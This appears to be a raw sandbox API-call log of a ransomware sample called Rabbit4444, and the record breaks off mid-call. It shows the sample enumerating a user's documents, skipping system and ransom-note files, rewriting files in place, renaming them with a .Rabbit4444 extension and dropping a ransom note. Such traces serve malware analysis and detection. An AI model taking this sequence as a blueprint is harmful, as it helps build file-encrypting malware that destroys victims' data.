1 [0049.903] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.904] CloseHandle (hObject=0x298) returned 1 [0049.904] CloseHandle (hObject=0x278) returned 1 [0049.905] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\DKUItMdMv.csv.Rabbit4444") returned 63 [0049.905] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\DKUItMdMv.csv" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\dkuitmdmv.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\DKUItMdMv.csv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\dkuitmdmv.csv.rabbit4444"), dwFlags=0x1) returned 1 [0049.905] InterlockedExchangeAdd (in: Addend=0xff618, Value=66112 | out: Addend=0xff618) returned 24018272 [0049.905] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3721 [0049.906] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc51f9540, ftCreationTime.dwHighDateTime=0x1d4d12a, ftLastAccessTime.dwLowDateTime=0xeffdfb80, ftLastAccessTime.dwHighDateTime=0x1d4c89c, ftLastWriteTime.dwLowDateTime=0xeffdfb80, ftLastWriteTime.dwHighDateTime=0x1d4c89c, nFileSizeHigh=0x0, nFileSizeLow=0x17a47, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PPT9PcnpxhtaoWPAl.ots", cAlternateFileName="PPT9PC~1.OTS")) returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="Rabbit4444.exe") returned -1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2=".") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="..") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="windows") returned -1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="bootmgr") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="pagefile.sys") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="boot") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="ids.txt") returned 1 [0049.906] lstrcmpiW (lpString1="PPT9PcnpxhtaoWPAl.ots", lpString2="NTUSER.DAT") returned 1 [0049.906] lstrcpyW (in: lpString1=0x130eb86, lpString2="PPT9PcnpxhtaoWPAl.ots" | out: lpString1="PPT9PcnpxhtaoWPAl.ots") returned="PPT9PcnpxhtaoWPAl.ots" [0049.906] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\PPT9PcnpxhtaoWPAl.ots", dwFileAttributes=0x0) returned 1 [0049.906] lstrlenW (lpString="PPT9PcnpxhtaoWPAl.ots") returned 21 [0049.906] lstrlenW (lpString="Rabbit4444") returned 10 [0049.906] lstrcmpiW (lpString1="aoWPAl.ots", lpString2="Rabbit4444") returned -1 [0049.906] lstrlenW (lpString=".dll") returned 4 [0049.906] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0049.906] lstrlenW (lpString=".lnk") returned 4 [0049.906] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0049.906] lstrlenW (lpString=".ini") returned 4 [0049.906] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0049.906] lstrlenW (lpString=".sys") returned 4 [0049.906] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0049.906] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\PPT9PcnpxhtaoWPAl.ots" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\ppt9pcnpxhtaowpal.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.907] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.907] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14121737577) returned 1 [0049.907] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=96839) returned 1 [0049.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0049.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0049.907] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17d50, lpName=0x0) returned 0x298 [0049.907] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17d50) returned 0x70000 [0049.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0049.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.910] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.910] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0049.910] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14122033387) returned 1 [0049.910] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0049.910] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0049.910] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.911] CloseHandle (hObject=0x298) returned 1 [0049.911] CloseHandle (hObject=0x278) returned 1 [0049.913] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\PPT9PcnpxhtaoWPAl.ots.Rabbit4444") returned 71 [0049.913] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\PPT9PcnpxhtaoWPAl.ots" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\ppt9pcnpxhtaowpal.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\PPT9PcnpxhtaoWPAl.ots.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\ppt9pcnpxhtaowpal.ots.rabbit4444"), dwFlags=0x1) returned 1 [0049.913] InterlockedExchangeAdd (in: Addend=0xff618, Value=96848 | out: Addend=0xff618) returned 24084384 [0049.913] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3723 [0049.913] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4484d690, ftCreationTime.dwHighDateTime=0x1d4ca39, ftLastAccessTime.dwLowDateTime=0x40eabf10, ftLastAccessTime.dwHighDateTime=0x1d4ccda, ftLastWriteTime.dwLowDateTime=0x40eabf10, ftLastWriteTime.dwHighDateTime=0x1d4ccda, nFileSizeHigh=0x0, nFileSizeLow=0x11507, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tlQ2QreLWNw1C.ots", cAlternateFileName="TLQ2QR~1.OTS")) returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="Rabbit4444.exe") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2=".") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="..") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="windows") returned -1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="bootmgr") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="pagefile.sys") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="boot") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="ids.txt") returned 1 [0049.913] lstrcmpiW (lpString1="tlQ2QreLWNw1C.ots", lpString2="NTUSER.DAT") returned 1 [0049.914] lstrcpyW (in: lpString1=0x130eb86, lpString2="tlQ2QreLWNw1C.ots" | out: lpString1="tlQ2QreLWNw1C.ots") returned="tlQ2QreLWNw1C.ots" [0049.914] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\tlQ2QreLWNw1C.ots", dwFileAttributes=0x0) returned 1 [0049.914] lstrlenW (lpString="tlQ2QreLWNw1C.ots") returned 17 [0049.914] lstrlenW (lpString="Rabbit4444") returned 10 [0049.914] lstrcmpiW (lpString1="LWNw1C.ots", lpString2="Rabbit4444") returned -1 [0049.914] lstrlenW (lpString=".dll") returned 4 [0049.914] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0049.914] lstrlenW (lpString=".lnk") returned 4 [0049.914] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0049.914] lstrlenW (lpString=".ini") returned 4 [0049.914] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0049.914] lstrlenW (lpString=".sys") returned 4 [0049.914] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0049.914] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\tlQ2QreLWNw1C.ots" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\tlq2qrelwnw1c.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.914] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.914] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14122493227) returned 1 [0049.914] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70919) returned 1 [0049.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0049.914] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11810, lpName=0x0) returned 0x298 [0049.914] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11810) returned 0x70000 [0049.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0049.916] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0049.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0049.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0049.917] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14122739962) returned 1 [0049.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0049.917] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.917] CloseHandle (hObject=0x298) returned 1 [0049.918] CloseHandle (hObject=0x278) returned 1 [0049.918] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\tlQ2QreLWNw1C.ots.Rabbit4444") returned 67 [0049.918] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\tlQ2QreLWNw1C.ots" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\tlq2qrelwnw1c.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\tlQ2QreLWNw1C.ots.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\tlq2qrelwnw1c.ots.rabbit4444"), dwFlags=0x1) returned 1 [0049.919] InterlockedExchangeAdd (in: Addend=0xff618, Value=70928 | out: Addend=0xff618) returned 24181232 [0049.919] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3725 [0049.919] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1060a30, ftCreationTime.dwHighDateTime=0x1d4cc75, ftLastAccessTime.dwLowDateTime=0x35f119c0, ftLastAccessTime.dwHighDateTime=0x1d4ce91, ftLastWriteTime.dwLowDateTime=0x35f119c0, ftLastWriteTime.dwHighDateTime=0x1d4ce91, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uTNr", cAlternateFileName="")) returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="Rabbit4444.exe") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2=".") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="..") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="windows") returned -1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="bootmgr") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="pagefile.sys") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="boot") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="ids.txt") returned 1 [0049.919] lstrcmpiW (lpString1="uTNr", lpString2="NTUSER.DAT") returned 1 [0049.919] lstrcpyW (in: lpString1=0x130eb86, lpString2="uTNr" | out: lpString1="uTNr") returned="uTNr" [0049.919] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6508 [0049.919] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x58) returned 0x115b08 [0049.919] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6510 | out: ListHead=0xf68b0, ListEntry=0xf6510) returned 0xf6370 [0049.919] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59634110, ftCreationTime.dwHighDateTime=0x1d4d0d7, ftLastAccessTime.dwLowDateTime=0xaa7495d0, ftLastAccessTime.dwHighDateTime=0x1d4d0f1, ftLastWriteTime.dwLowDateTime=0xaa7495d0, ftLastWriteTime.dwHighDateTime=0x1d4d0f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yaO0UrYZwssx3x", cAlternateFileName="YAO0UR~1")) returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="Rabbit4444.exe") returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2=".") returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="..") returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="windows") returned 1 [0049.919] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="bootmgr") returned 1 [0049.920] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="pagefile.sys") returned 1 [0049.920] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="boot") returned 1 [0049.920] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="ids.txt") returned 1 [0049.920] lstrcmpiW (lpString1="yaO0UrYZwssx3x", lpString2="NTUSER.DAT") returned 1 [0049.920] lstrcpyW (in: lpString1=0x130eb86, lpString2="yaO0UrYZwssx3x" | out: lpString1="yaO0UrYZwssx3x") returned="yaO0UrYZwssx3x" [0049.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6408 [0049.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6c) returned 0x117680 [0049.920] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6410 | out: ListHead=0xf68b0, ListEntry=0xf6410) returned 0xf6510 [0049.920] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59634110, ftCreationTime.dwHighDateTime=0x1d4d0d7, ftLastAccessTime.dwLowDateTime=0xaa7495d0, ftLastAccessTime.dwHighDateTime=0x1d4d0f1, ftLastWriteTime.dwLowDateTime=0xaa7495d0, ftLastWriteTime.dwHighDateTime=0x1d4d0f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yaO0UrYZwssx3x", cAlternateFileName="YAO0UR~1")) returned 0 [0049.920] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0049.920] lstrcpyW (in: lpString1=0x130eb86, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.920] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.920] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.920] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.921] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.921] CloseHandle (hObject=0x278) returned 1 [0049.921] CloseHandle (hObject=0x27c) returned 1 [0049.921] GetCurrentThreadId () returned 0xd98 [0049.922] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0049.922] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x" [0049.922] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0049.922] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0049.922] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x" [0049.922] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\" [0049.922] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\.BFC0E91B00AE8A0620D3" [0049.922] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\49_hdohrbso9\\yao0uryzwssx3x\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.923] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.925] FlushFileBuffers (hFile=0x27c) returned 1 [0049.926] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.926] CloseHandle (hObject=0x27c) returned 1 [0049.927] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x") returned 53 [0049.927] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.927] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59634110, ftCreationTime.dwHighDateTime=0x1d4d0d7, ftLastAccessTime.dwLowDateTime=0xaa7495d0, ftLastAccessTime.dwHighDateTime=0x1d4d0f1, ftLastWriteTime.dwLowDateTime=0xe71550d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0049.927] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.927] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.927] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.927] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.927] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59634110, ftCreationTime.dwHighDateTime=0x1d4d0d7, ftLastAccessTime.dwLowDateTime=0xaa7495d0, ftLastAccessTime.dwHighDateTime=0x1d4d0f1, ftLastWriteTime.dwLowDateTime=0xe71550d1, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.927] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.927] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.927] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.927] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.927] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.927] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x592de5b0, ftCreationTime.dwHighDateTime=0x1d4c7c2, ftLastAccessTime.dwLowDateTime=0x89355880, ftLastAccessTime.dwHighDateTime=0x1d4cb94, ftLastWriteTime.dwLowDateTime=0x89355880, ftLastWriteTime.dwHighDateTime=0x1d4cb94, nFileSizeHigh=0x0, nFileSizeLow=0x2300, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-fpJmWMI.docx", cAlternateFileName="-FPJMW~1.DOC")) returned 1 [0049.927] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.927] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.927] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="Rabbit4444.exe") returned -1 [0049.927] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2=".") returned 1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="..") returned 1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="windows") returned -1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="bootmgr") returned 1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="pagefile.sys") returned -1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="boot") returned 1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="ids.txt") returned -1 [0049.928] lstrcmpiW (lpString1="-fpJmWMI.docx", lpString2="NTUSER.DAT") returned -1 [0049.928] lstrcpyW (in: lpString1=0x130eba4, lpString2="-fpJmWMI.docx" | out: lpString1="-fpJmWMI.docx") returned="-fpJmWMI.docx" [0049.928] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\49_hdOHrBSo9\\yaO0UrYZwssx3x\\-fpJmWMI.docx", dwFileAttributes=0x0) returned 1 [0049.928] lstrlenW (lpString="-fpJmWMI.docx") returned 13 [0049.928] lstrlenW (lpString="Rabbit4444") returned 10 [0049.928] lstrcmpiW (lpString1="JmWMI.docx", lpString2="Rabbit4444") returned -1 [0049.928] lstrlenW (lpString=".dll") returned 4 [0049.928] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.928] lstrlenW (lpString=".lnk") returned 4 [0049.928] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.928] lstrlenW (lpString=".ini") returned 4 [0049.928] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.928] lstrlenW (lpString=".sys") returned 4 [0049.928] lstrcmpiW 